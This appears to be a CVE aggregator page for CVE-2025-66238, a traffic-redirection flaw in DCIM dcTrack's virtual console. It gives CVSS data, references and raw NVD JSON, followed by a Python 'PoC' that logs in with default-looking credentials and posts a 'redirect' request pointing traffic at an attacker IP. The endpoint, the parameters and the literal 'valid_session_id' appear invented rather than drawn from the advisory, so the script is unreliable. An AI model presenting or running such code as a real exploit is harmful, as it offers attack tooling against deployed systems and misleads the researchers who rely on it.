CVE-2025-66238

Description

DCIM dcTrack allows an attacker to misuse certain remote access features. An authenticated user with access to the appliance's virtual console could exploit these features to redirect network traffic, potentially accessing restricted services or data on the host machine.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

DCIM dcTrack 全部版本（截至2025年12月）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-66238 PoC - DCIM dcTrack Network Traffic Redirection
# This PoC demonstrates the vulnerability in dcTrack remote access feature

import requests
import json

TARGET_URL = "https://target-dctrack.example.com"
ATTACKER_CONTROLLED_IP = "10.0.0.1"

def exploit_cve_2025_66238():
    """
    Exploit for CVE-2025-66238: DCIM dcTrack Remote Access Feature Misuse
    Requires authenticated high-privilege user access to virtual console
    """
    
    # Step 1: Authenticate with high-privilege account
    login_url = f"{TARGET_URL}/api/auth/login"
    credentials = {
        "username": "admin",
        "password": "password"
    }
    
    session = requests.Session()
    response = session.post(login_url, json=credentials)
    
    if response.status_code != 200:
        print("[-] Authentication failed")
        return False
    
    print("[+] Authentication successful")
    
    # Step 2: Access virtual console feature
    console_url = f"{TARGET_URL}/api/virtual-console/start"
    
    # Step 3: Exploit network redirection vulnerability
    exploit_data = {
        "session_id": "valid_session_id",
        "action": "redirect",
        "target_ip": ATTACKER_CONTROLLED_IP,
        "port": 443,
        "protocol": "tcp"
    }
    
    response = session.post(console_url, json=exploit_data)
    
    if response.status_code == 200:
        print("[+] Network traffic redirection successful")
        print(f"[*] Traffic now being redirected to: {ATTACKER_CONTROLLED_IP}:443")
        return True
    else:
        print("[-] Exploitation failed")
        return False

if __name__ == "__main__":
    exploit_cve_2025_66238()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66238
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66238
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66238/
[4] VulDB https://vuldb.com/cve/CVE-2025-66238
[5] https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-338-05.json
[6] https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-05

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66238", "sourceIdentifier": "[email protected]", "published": "2025-12-04T22:15:49.320", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "DCIM dcTrack allows an attacker to misuse certain remote access features. An authenticated user with access to the appliance's virtual console could exploit these features to redirect network traffic, potentially accessing restricted services or data on the host machine."}, {"lang": "es", "value": "DCIM dcTrack permite a un atacante hacer un uso indebido de ciertas características de acceso remoto. Un usuario autenticado con acceso a la consola virtual del dispositivo podría explotar estas características para redirigir el tráfico de red, accediendo potencialmente a servicios o datos restringidos en la máquina anfitriona."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-338-05.json", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-05", "source": "[email protected]"}]}}